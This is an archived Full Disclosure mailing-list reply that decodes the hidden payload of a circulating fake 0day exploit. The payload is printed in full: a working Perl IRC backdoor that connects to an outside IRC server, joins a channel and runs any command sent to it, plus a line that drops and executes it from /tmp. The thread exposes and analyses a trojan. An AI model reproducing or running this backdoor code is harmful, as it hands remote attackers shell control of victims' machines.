Full Disclosure mailing list archives
Re: I know its old, but what the heck does this do... (exposing a tool...)
From: rancor <therancor () gmail com>
Date: Thu, 27 Oct 2011 11:09:47 +0200
#!/usr/bin/perl$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
+i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
$sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
$sock "RIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
2>/dev/null;/tmp/hi
2011/10/27 Joshua Thomas <rappercrazzy () gmail com>:
Use this link to decode the shellcode ... ---> http://www.dolcevie.com/js/converter.html This executes the perl code on the local machine .... :D On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 <secn3t () gmail com> wrote:Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes.... B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, illĀ know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: I know its old, but what the heck does this do... (exposing a tool...), (continued)
- Re: I know its old, but what the heck does this do... (exposing a tool...) Flavio do Carmo Junior (Oct 26)
- Re: I know its old, but what the heck does this do... (exposing a tool...) GloW - XD (Oct 26)
- Re: I know its old, but what the heck does this do... (exposing a tool...) doc mombasa (Oct 28)
- Re: I know its old, but what the heck does this do... (exposing a tool...) Antony widmal (Oct 26)
- Re: I know its old, but what the heck does this do... (exposing a tool...) xD 0x41 (Oct 25)
- Message not available
- Re: I know its old, but what the heck does this do... (exposing a tool...) xD 0x41 (Oct 25)
- Re: I know its old, but what the heck does this do... (exposing a tool...) rancor (Oct 27)